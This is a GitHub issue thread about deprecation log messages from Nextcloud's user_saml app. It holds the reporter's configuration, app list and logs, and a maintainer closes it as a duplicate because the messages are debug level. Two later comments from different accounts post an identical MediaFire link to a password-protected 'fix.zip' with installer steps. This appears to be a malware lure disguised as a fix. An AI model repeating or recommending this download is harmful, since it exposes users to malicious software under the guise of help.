### ISSUE TITLE
[Bug]: Deprecated usage of /appinfo/app.php in user_saml app

### ISSUE THREAD

**Issue by Be-Mann** [nextcloud/server#47548] opened 2024-08-27 18:59 UTC
### ⚠️ This issue respects the following points: ⚠️

- [X] This is a **bug**, not a question or a configuration/webserver/proxy issue.
- [X] This issue is **not** already reported on [Github](https://github.com/nextcloud/server/issues?q=is%3Aopen+is%3Aissue+label%3Abug) OR [Nextcloud Community Forum](https://help.nextcloud.com/) _(I've searched it)_.
- [X] Nextcloud Server **is** up to date. See [Maintenance and Release Schedule](https://github.com/nextcloud/server/wiki/Maintenance-and-Release-Schedule) for supported versions.
- [X] I agree to follow Nextcloud's [Code of Conduct](https://nextcloud.com/contribute/code-of-conduct/).

### Bug description

We have identified an issue with the user_saml app where it is utilizing deprecated functionality. The log shows repeated warnings regarding the usage of /appinfo/app.php which has been deprecated in favor of \OCP\AppFramework\Bootstrap\IBootstrap within the application class.

This issue was detected in Nextcloud Server version 29.0.5.1.

```json
{
  "reqId": "[REQUEST_ID]",
  "level": 0,
  "time": "27.08.2024 16:17:18",
  "remoteAddr": "[IP_ADDRESS]",
  "user": "[USERNAME]",
  "app": "user_saml",
  "method": "POST",
  "url": "/index.php/apps/notify_push/pre_auth",
  "message": "/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.",
  "userAgent": "[USER_AGENT]",
  "version": "29.0.5.1",
  "data": {
    "app": "user_saml"
  }
}
```

This warning appears multiple times in the logs, suggesting that the user_saml app has not yet been updated to use the proper framework interface.

### Steps to reproduce

1. Configure and activate the user_saml app.
2. Perform any action that triggers SAML authentication (e.g., login or pre-authentication with notify_push).
3. Review logs for deprecation warnings.

### Expected behavior

The app should use the \OCP\AppFramework\Bootstrap\IBootstrap interface in the application class to ensure compatibility with future Nextcloud versions and avoid deprecated code warnings.

### Installation method

Community Docker image

### Nextcloud Server version

29

### Operating system

Debian/Ubuntu

### PHP engine version

PHP 8.2

### Web server

Apache (supported)

### Database engine version

MySQL

### Is this bug present after an update or on a fresh install?

Upgraded to a MAJOR version (ex. 28 to 29)

### Are you using the Nextcloud Server Encryption module?

Encryption is Disabled

### What user-backends are you using?

- [ ] Default user-backend _(database)_
- [ ] LDAP/ Active Directory
- [X] SSO - SAML
- [ ] Other

### Configuration report

```shell
{
    "system": {
        "memcache.local": "\\OC\\Memcache\\APCu",
        "apps_paths": [
            {
                "path": "\/var\/www\/html\/apps",
                "url": "\/apps",
                "writable": false
            },
            {
                "path": "\/var\/www\/html\/custom_apps",
                "url": "\/custom_apps",
                "writable": true
            }
        ],
        "passwordsalt": "***REMOVED SENSITIVE VALUE***",
        "secret": "***REMOVED SENSITIVE VALUE***",
        "trusted_domains": [
            "nextcloud2.druckplanet24.de"
        ],
        "datadirectory": "***REMOVED SENSITIVE VALUE***",
        "dbtype": "mysql",
        "version": "29.0.5.1",
        "trusted_proxies": "***REMOVED SENSITIVE VALUE***",
        "overwrite.cli.url": "***REMOVED SENSITIVE VALUE***",
        "overwritehost": "***REMOVED SENSITIVE VALUE***",
        "overwriteprotocol": "https",
        "dbname": "***REMOVED SENSITIVE VALUE***",
        "dbhost": "***REMOVED SENSITIVE VALUE***",
        "dbport": "3306",
        "dbtableprefix": "oc_",
        "mysql.utf8mb4": true,
        "dbuser": "***REMOVED SENSITIVE VALUE***",
        "dbpassword": "***REMOVED SENSITIVE VALUE***",
        "installed": true,
        "instanceid": "***REMOVED SENSITIVE VALUE***",
        "activity_expire_days": 14,
        "trashbin_retention_obligation": "60, 7",
        "versions_retention_obligation": "auto, 365",
        "default_language": "de",
        "default_locale": "de_DE",
        "memcache.distributed": "\\OC\\Memcache\\Redis",
        "memcache.locking": "\\OC\\Memcache\\Redis",
        "redis": {
            "host": "***REMOVED SENSITIVE VALUE***",
            "password": "***REMOVED SENSITIVE VALUE***",
            "port": 6379
        },
        "app_install_overwrite": [
            "impersonate",
            "files_external_onedrive",
            "duplicatefinder",
            "ldap_contacts_backend",
            "fulltextsearch",
            "occweb",
            "officeonline",
            "sharepoint",
            "files_fulltextsearch_tesseract"
        ],
        "maintenance": false,
        "log_type": "file",
        "logfile": "\/var\/log\/nextcloud\/nextcloud.log",
        "loglevel": 2,
        "logdateformat": "d.m.Y H:i:s",
        "default_phone_region": "DE",
        "mail_from_address": "***REMOVED SENSITIVE VALUE***",
        "mail_smtpmode": "smtp",
        "mail_sendmailmode": "smtp",
        "mail_domain": "***REMOVED SENSITIVE VALUE***",
        "mail_smtpauthtype": "LOGIN",
        "mail_smtphost": "***REMOVED SENSITIVE VALUE***",
        "blacklisted_files": [
            ".htaccess",
            ".DS_Store",
            "._*",
            "*.tmp",
            "~$*",
            "$RECYCLE.BIN",
            "Icon?",
            "desktop.ini",
            "Icon\uf00d",
            ".Spotlight-V100",
            "System Volume Information",
            ".Trashes",
            ".ds_store",
            "FILE*.CH",
            "FOUND.*",
            "*.filepart",
            "*.crdownload",
            ".~lock.*",
            "Thumbs.db",
            "thumbs.db"
        ],
        "cron_log": true,
        "enable_previews": true,
        "enabledPreviewProviders": [
            "OC\\Preview\\PNG",
            "OC\\Preview\\JPEG",
            "OC\\Preview\\GIF",
            "OC\\Preview\\BMP",
            "OC\\Preview\\XBitmap",
            "OC\\Preview\\Movie",
            "OC\\Preview\\PDF",
            "OC\\Preview\\MP3",
            "OC\\Preview\\TXT",
            "OC\\Preview\\MarkDown",
            "OC\\Preview\\Illustrator",
            "OC\\Preview\\Photoshop",
            "OC\\Preview\\SVG",
            "OC\\Preview\\TIFF",
            "OC\\Preview\\Font",
            "OC\\Preview\\MSOffice2003",
            "OC\\Preview\\MSOffice2007",
            "OC\\Preview\\MSOfficeDoc",
            "OC\\Preview\\OpenDocument",
            "OC\\Preview\\Postscript",
            "OC\\Preview\\StarOffice"
        ],
        "preview_max_x": 1024,
        "preview_max_y": 768,
        "preview_max_scale_factor": 1,
        "preview_max_filesize_image": 50,
        "filesystem_check_changes": 1,
        "filelocking.enabled": "true",
        "integrity.check.disabled": false,
        "remember_login_cookie_lifetime": "1800",
        "session_lifetime": 86400,
        "session_keepalive": true,
        "token_auth_enforced": false,
        "has_internet_connection": true,
        "sort_groups_by_name": true,
        "app.mail.verify-tls-peer": false,
        "forwarded_for_headers": [
            "HTTP_X_FORWARDED_FOR"
        ],
        "mail_smtpport": "587",
        "mail_smtpauth": true,
        "mail_smtpname": "***REMOVED SENSITIVE VALUE***",
        "mail_smtppassword": "***REMOVED SENSITIVE VALUE***",
        "bulkupload.enabled": false,
        "updater.release.channel": "stable",
        "mail_smtpsecure": "tls",
        "maintenance_window_start": 2
    }
}
```

### List of activated Apps

```shell
Enabled:
  - activity: 2.21.1
  - admin_audit: 1.19.0
  - bruteforcesettings: 2.9.0
  - calendar: 4.7.16
  - circles: 29.0.0-dev
  - cloud_federation_api: 1.12.0
  - comments: 1.19.0
  - contacts: 6.0.0
  - contactsinteraction: 1.10.0
  - dashboard: 7.9.0
  - dav: 1.30.1
  - event_update_notification: 2.4.0
  - external: 5.4.0
  - federatedfilesharing: 1.19.0
  - federation: 1.19.0
  - files: 2.1.1
  - files_downloadlimit: 2.0.0
  - files_external: 1.21.0
  - files_fulltextsearch: 29.0.1
  - files_fulltextsearch_tesseract: 27.0.0
  - files_pdfviewer: 2.10.0
  - files_reminders: 1.2.0
  - files_sharing: 1.21.0
  - files_trashbin: 1.19.0
  - files_versions: 1.22.0
  - firstrunwizard: 2.18.0
  - fulltextsearch: 29.0.1
  - fulltextsearch_elasticsearch: 29.0.1
  - groupfolders: 17.0.2
  - impersonate: 1.16.0
  - ldap_contacts_backend: 1.9.0
  - logreader: 2.14.0
  - lookup_server_connector: 1.17.0
  - nextcloud_announcements: 1.18.0
  - notifications: 2.17.0
  - notify_push: 0.7.0
  - oauth2: 1.17.0
  - password_policy: 1.19.0
  - passwords: 2024.7.20
  - photos: 2.5.0
  - privacy: 1.13.0
  - provisioning_api: 1.19.0
  - quota_warning: 1.20.0
  - recommendations: 2.1.0
  - related_resources: 1.4.0
  - settings: 1.12.0
  - sharebymail: 1.19.0
  - sharepoint: 1.17.0
  - survey_client: 1.17.0
  - systemtags: 1.19.0
  - text: 3.10.1
  - theming: 2.4.0
  - twofactor_backupcodes: 1.18.0
  - twofactor_nextcloud_notification: 3.9.0
  - twofactor_webauthn: 1.4.0
  - updatenotification: 1.19.1
  - user_saml: 6.2.0
  - user_status: 1.9.0
  - viewer: 2.3.0
  - workflowengine: 2.11.0
Disabled:
  - camerarawpreviews: 0.8.5 (installed 0.8.5)
  - duplicatefinder: 1.2.5 (installed 1.2.5)
  - encryption: 2.17.0
  - files_accesscontrol: 1.19.1 (installed 1.19.1)
  - files_automatedtagging: 1.19.0 (installed 1.19.0)
  - files_downloadactivity: 1.17.0 (installed 1.17.0)
  - files_external_onedrive: 1.1.0 (installed 1.1.0)
  - files_retention: 1.18.0 (installed 1.18.0)
  - files_rightclick: 0.15.1 (installed 1.6.0)
  - occweb: 0.2.0 (installed 0.2.0)
  - officeonline: 2.2.1 (installed 2.2.1)
  - ransomware_protection: 1.14.0 (installed 1.14.0)
  - serverinfo: 1.19.0 (installed 1.19.0)
  - support: 1.12.0 (installed 1.8.0)
  - suspicious_login: 7.0.0
  - tasks: 0.16.1 (installed 0.16.1)
  - terms_of_service: 2.5.0 (installed 2.5.0)
  - twofactor_email: 2.7.4 (installed 2.7.4)
  - twofactor_reminder: 1.1.0 (installed 1.0.0)
  - twofactor_totp: 11.0.0-dev
  - user_ldap: 1.20.0 (installed 1.15.0)
  - weather_status: 1.9.0 (installed 1.5.0
```

### Nextcloud Signing status

```shell
No errors have been found.
```

### Nextcloud Logs

```shell
{"reqId":"[REQUEST_ID_1]","level":0,"time":"27.08.2024 18:50:29","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"POST","url":"/index.php/apps/notify_push/pre_auth","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_2]","level":0,"time":"27.08.2024 18:50:32","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"GET","url":"/index.php/apps/logreader/api/poll?lastReqId=[LAST_REQUEST_ID]","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_3]","level":0,"time":"27.08.2024 18:50:33","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"GET","url":"/index.php/settings/admin/overview","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_4]","level":0,"time":"27.08.2024 18:50:37","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"GET","url":"/ocs/v2.php/search/providers?from=%2Fsettings%2Fadmin%2Foverview","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_5]","level":0,"time":"27.08.2024 18:50:37","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"POST","url":"/index.php/contactsmenu/contacts","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_6]","level":0,"time":"27.08.2024 18:50:38","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"GET","url":"/ocs/v2.php/apps/user_status/api/v1/user_status","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
{"reqId":"[REQUEST_ID_7]","level":0,"time":"27.08.2024 18:50:38","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"dav","method":"GET","url":"/ocs/v2.php/apps/user_status/api/v1/user_status","message":"No calendar events found for status check","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"dav","user":"[USER_EMAIL]"}}
{"reqId":"[REQUEST_ID_8]","level":0,"time":"27.08.2024 18:50:38","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"no app in context","method":"GET","url":"/ocs/v2.php/apps/user_status/api/v1/user_status","message":"dirty table reads: SELECT * FROM `*PREFIX*user_status` WHERE `user_id` = :dcValue1","userAgent":"[USER_AGENT]","version":"29.0.5.1","exception":{"Exception":"Exception","Message":"dirty table reads: SELECT * FROM `*PREFIX*user_status` WHERE `user_id` = :dcValue1","Code":0,"Trace":[{"file":"/var/www/html/3rdparty/doctrine/dbal/src/Query/QueryBuilder.php","line":344,"function":"executeQuery","class":"OC\\DB\\Connection","type":"->","args":["SELECT * FROM `*PREFIX*user_status` WHERE `user_id` = :dcValue1",["[USER_EMAIL]"],[2],null]}],"File":"/var/www/html/lib/private/DB/Connection.php","Line":320,"message":"dirty table reads: SELECT * FROM `*PREFIX*user_status` WHERE `user_id` = :dcValue1","tables":["oc_user_status"],"reads":["oc_user_status"],"exception":{},"CustomMessage":"dirty table reads: SELECT * FROM `*PREFIX*user_status` WHERE `user_id` = :dcValue1"}}
{"reqId":"[REQUEST_ID_9]","level":0,"time":"27.08.2024 18:50:38","remoteAddr":"[IP_ADDRESS]","user":"--","app":"webdav","method":"PROPFIND","url":"/remote.php/webdav","message":"No 'Authorization: Basic' header found. Either the client didn't send one, or the server is misconfigured","userAgent":"[USER_AGENT]","version":"29.0.5.1","exception":{"Exception":"Sabre\\DAV\\Exception\\NotAuthenticated","Message":"No 'Authorization: Basic' header found. Either the client didn't send one, or the server is misconfigured","Code":0,"Trace":[{"file":"/var/www/html/3rdparty/sabre/event/lib/WildcardEmitterTrait.php","line":89,"function":"beforeMethod","class":"Sabre\\DAV\\Auth\\Plugin","type":"->","args":[["Sabre\\HTTP\\Request"],["Sabre\\HTTP\\Response"]]},{"file":"/var/www/html/3rdparty/sabre/dav/lib/DAV/Server.php","line":456,"function":"emit","class":"Sabre\\DAV\\Server","type":"->","args":["beforeMethod:PROPFIND",[["Sabre\\HTTP\\Request"],["Sabre\\HTTP\\Response"]]]},{"file":"/var/www/html/3rdparty/sabre/dav/lib/DAV/Server.php","line":253,"function":"invokeMethod","class":"Sabre\\DAV\\Server","type":"->","args":[["Sabre\\HTTP\\Request"],["Sabre\\HTTP\\Response"]]]},{"file":"/var/www/html/3rdparty/sabre/dav/lib/DAV/Server.php","line":321,"function":"start","class":"Sabre\\DAV\\Server","type":"->","args":[]},{"file":"/var/www/html/apps/dav/appinfo/v1/webdav.php","line":88,"function":"exec","class":"Sabre\\DAV\\Server","type":"->","args":[]},{"file":"/var/www/html/remote.php","line":172,"args":["/var/www/html/apps/dav/appinfo/v1/webdav.php"],"function":"require_once"}],"File":"/var/www/html/3rdparty/sabre/dav/lib/DAV/Auth/Plugin.php","Line":152,"message":"No 'Authorization: Basic' header found. Either the client didn't send one, or the server is misconfigured","exception":{},"CustomMessage":"No 'Authorization: Basic' header found. Either the client didn't send one, or the server is misconfigured"}}
{"reqId":"[REQUEST_ID_10]","level":0,"time":"27.08.2024 18:50:46","remoteAddr":"[IP_ADDRESS]","user":"[USER_EMAIL]","app":"user_saml","method":"POST","url":"/index.php/apps/notify_push/pre_auth","message":"/appinfo/app.php is deprecated, use \\OCP\\AppFramework\\Bootstrap\\IBootstrap on the application class instead.","userAgent":"[USER_AGENT]","version":"29.0.5.1","data":{"app":"user_saml"}}
```

### Additional info

The issue appears on a Nextcloud instance upgraded to version 29.0.5.1, and the deprecated warning persists across multiple requests, particularly related to SAML authentication.

**Comment by solracsf** [comment] 2024-08-27 19:29
That is not a warning but a debug level (level zero) log.
Closing as duplicate of https://github.com/nextcloud/server/issues/32132

**Closed by solracsf** 2024-08-27 19:29 UTC
Labels: bug, 0. Needs triage

**Comment by Vomgnar** [comment] 2024-08-28 04:52
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment] 2024-08-28 07:15
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
